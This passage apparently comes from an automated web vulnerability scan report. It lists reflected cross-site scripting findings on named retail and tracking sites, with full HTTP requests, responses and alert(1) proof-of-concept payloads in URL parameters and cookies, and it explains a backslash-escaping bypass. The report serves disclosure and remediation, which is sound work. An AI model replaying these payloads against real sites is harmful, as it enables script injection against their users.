The value of the tile request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1abf9\"%3balert(1)//e408dc57373 was submitted in the tile parameter. This input was echoed as 1abf9\\";alert(1)//e408dc57373 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /house-plants-PBS?tile=hmpg_podA1abf9\"%3balert(1)//e408dc57373&Ref=HomeNoRef HTTP/1.1
Host: www.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253Ahome%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.proflowers.com%25252Fhouse-plants-PBS%25253Ftile%25253Dhmpg_podA%252526Ref%25253DHomeNoRef%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:16:38 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:16:39 GMT
Content-Length: 198580


<noscript>
<div class="splashBox">
   <font style="font-size:16pt;color: #fff786;margin: 10px;">We&rsquo;re Sorry - </font>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not ha
...[SNIP]...
nguage="JavaScript" type="text/javascript">s.pageName = "PFC:Category:PBS";if ("Category" == "SEO-Local") {s.prop1 = "PFC:Category:SEO-";}else {s.prop1 = "PFC:Category:PBS";}s.eVar8 = "";if ("hmpg_podA1abf9\\";alert(1)//e408dc57373" != "") {s.eVar20 = "PFC_hmpg_podA1abf9\\";alert(1)//e408dc57373_";}</script>
...[SNIP]...
4.194. http://www.proflowers.com/mothers-day-flowers-MDF [tile parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.proflowers.com
Path:   /mothers-day-flowers-MDF

Issue detail

The value of the tile request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c36a\"%3balert(1)//decb137eb0b was submitted in the tile parameter. This input was echoed as 6c36a\\";alert(1)//decb137eb0b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /mothers-day-flowers-MDF?tile=hmpg_hero16c36a\"%3balert(1)//decb137eb0b&Ref=HomeNoRef HTTP/1.1
Host: www.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; s_cc=true; RES_TRACKINGID=674723556265235; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253Ahome%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.proflowers.com%25252Fmothers-day-flowers-MDF%25253Ftile%25253Dhmpg_hero1%252526Ref%25253DHomeNoRef%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:12:09 GMT
Content-Length: 255379


<noscript>
<div class="splashBox">
   <font style="font-size:16pt;color: #fff786;margin: 10px;">We&rsquo;re Sorry - </font>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not ha
...[SNIP]...
guage="JavaScript" type="text/javascript">s.pageName = "PFC:Category:MDF";if ("Category" == "SEO-Local") {s.prop1 = "PFC:Category:SEO-";}else {s.prop1 = "PFC:Category:MDF";}s.eVar8 = "";if ("hmpg_hero16c36a\\";alert(1)//decb137eb0b" != "") {s.eVar20 = "PFC_hmpg_hero16c36a\\";alert(1)//decb137eb0b_";}</script>
...[SNIP]...
4.195. http://www.proflowers.com/send-flowers-bsl [tile parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.proflowers.com
Path:   /send-flowers-bsl

Issue detail

The value of the tile request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22db9\"%3balert(1)//18210ad228e was submitted in the tile parameter. This input was echoed as 22db9\\";alert(1)//18210ad228e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /send-flowers-bsl?tile=22db9\"%3balert(1)//18210ad228e&Ref=HomeNoRef HTTP/1.1
Host: www.proflowers.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM?30003767&5/9/2011 5:13:31 AM; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM?30003767&5/9/2011 5:13:31 AM?0&5/9/2011 5:29:48 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:29:48 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:29:49 GMT
Content-Length: 247576


<noscript>
<div class="splashBox">
   <font style="font-size:16pt;color: #fff786;margin: 10px;">We&rsquo;re Sorry - </font>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not ha
...[SNIP]...
script language="JavaScript" type="text/javascript">s.pageName = "PFC:Category:bsl";if ("Category" == "SEO-Local") {s.prop1 = "PFC:Category:SEO-";}else {s.prop1 = "PFC:Category:bsl";}s.eVar8 = "";if ("22db9\\";alert(1)//18210ad228e" != "") {s.eVar20 = "PFC_22db9\\";alert(1)//18210ad228e_";}</script>
...[SNIP]...
4.196. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137 [PFC_BrowserId cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Mothers-Day-Bouquet-30050137

Issue detail

The value of the PFC_BrowserId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b4f5</script><script>alert(1)</script>3d893853418 was submitted in the PFC_BrowserId cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a3b4f5</script><script>alert(1)</script>3d893853418; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; s_cc=true; RES_TRACKINGID=674723556265235; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253Ahome%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Mothers-Day-Bouquet-30050137%25253Ftrackingpgroup%25253DHPC%252526tile%25253Dh%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:13:06 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:13:06 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:13:06 GMT
Content-Length: 143391


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
=100000;
resx.event="Product";
resx.links="30050137;5519;42864;";
resx.itemid = "30050137";
resx.qty="1";
resx.price="49.98";
resx.total="";
resx.customerid="91621bab-4967-45f8-ad8e-98be730e6e4a3b4f5</script><script>alert(1)</script>3d893853418";
resx.transactionid = "";


resx.cv2 = "PFC";
resx.cv3 = "HPC";
resx.cv4 = "27";
resx.cv5="";
resx.cv6="";
resx.cv7 ="";
resx.cv8 ="";
resx.cv9 ="";
resx.cv10 ="";
resx.cv11 = "";
resx
...[SNIP]...
4.197. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396 [PFC_BrowserId cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Succulent-Garden-30008396

Issue detail

The value of the PFC_BrowserId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa3cf</script><script>alert(1)</script>87e0272715b was submitted in the PFC_BrowserId cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /flowers/Deluxe-Succulent-Garden-30008396?viewpos=1&trackingpgroup=PBS&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA1abf9\%22%3balert(1)//e408dc57373&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4afa3cf</script><script>alert(1)</script>87e0272715b; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253Aproductgroup%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Succulent-Garden-30008396%25253Fviewpos%25253D1%252526trackingpgroup%25253DPBS%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:37:14 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:37:14 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:37:14 GMT
Content-Length: 138355


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...

resx.event="Product";
resx.links="30008396;5519;42864;30050137;";
resx.itemid = "30008396";
resx.qty="1";
resx.price="39.99";
resx.total="";
resx.customerid="91621bab-4967-45f8-ad8e-98be730e6e4afa3cf</script><script>alert(1)</script>87e0272715b";
resx.transactionid = "";


resx.cv2 = "PFC";
resx.cv3 = "PBS";
resx.cv4 = "27";
resx.cv5="";
resx.cv6="";
resx.cv7 ="";
resx.cv8 ="";
resx.cv9 ="";
resx.cv10 ="";
resx.cv11 = "";
resx
...[SNIP]...
4.198. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767 [PFC_BrowserId cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/The-Ultimate-Office-Plant-30003767

Issue detail

The value of the PFC_BrowserId cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1aebe</script><script>alert(1)</script>f63217f9c47 was submitted in the PFC_BrowserId cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a1aebe</script><script>alert(1)</script>f63217f9c47; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253APBS%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FThe-Ultimate-Office-Plant-30003767%25253Fviewpos%25253D6%252526trackingpgroup%25253DP%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:29:34 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:29:34 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:29:34 GMT
Content-Length: 141286


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...

resx.event="Product";
resx.links="30003767;5519;42864;30050137;";
resx.itemid = "30003767";
resx.qty="1";
resx.price="49.98";
resx.total="";
resx.customerid="91621bab-4967-45f8-ad8e-98be730e6e4a1aebe</script><script>alert(1)</script>f63217f9c47";
resx.transactionid = "";


resx.cv2 = "PFC";
resx.cv3 = "PBS";
resx.cv4 = "27";
resx.cv5="";
resx.cv6="";
resx.cv7 ="";
resx.cv8 ="";
resx.cv9 ="";
resx.cv10 ="";
resx.cv11 = "";
resx
...[SNIP]...
4.199. http://seg.sharethis.com/getSegment.php [__stid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seg.sharethis.com
Path:   /getSegment.php

Issue detail

The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload 5b716<script>alert(1)</script>eaf91aadd9b was submitted in the __stid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /getSegment.php?purl=http%3A%2F%2Fww30.1800baskets.com%2Fproduct.do%3FbaseCode%3D93260%26dataset%3D11309&jsref=http%3A%2F%2Fww30.1800baskets.com%2Ftemplate.do%3Fid%3Dtemplate3%26page%3D2000&rnd=1304903453531 HTTP/1.1
Host: seg.sharethis.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800baskets.com/product.do?baseCode=93260&dataset=11309
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==5b716<script>alert(1)</script>eaf91aadd9b; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Mon, 09 May 2011 01:18:10 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 1368


           <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
           <html>
           <head>
           <meta http-equiv="Content-type" content="text/html;charset=UTF-8">
           
...[SNIP]...
<div style='display:none'>clicookie:CspT702sdV9LL0aNgCmJAg==5b716<script>alert(1)</script>eaf91aadd9b
userid:
</div>
...[SNIP]...
4.200. http://ww30.1800baskets.com/product.do [ShopperManagerEnterprise cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ww30.1800baskets.com
Path:   /product.do

Issue detail

The value of the ShopperManagerEnterprise cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c266'-alert(1)-'ef80968ac09 was submitted in the ShopperManagerEnterprise cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

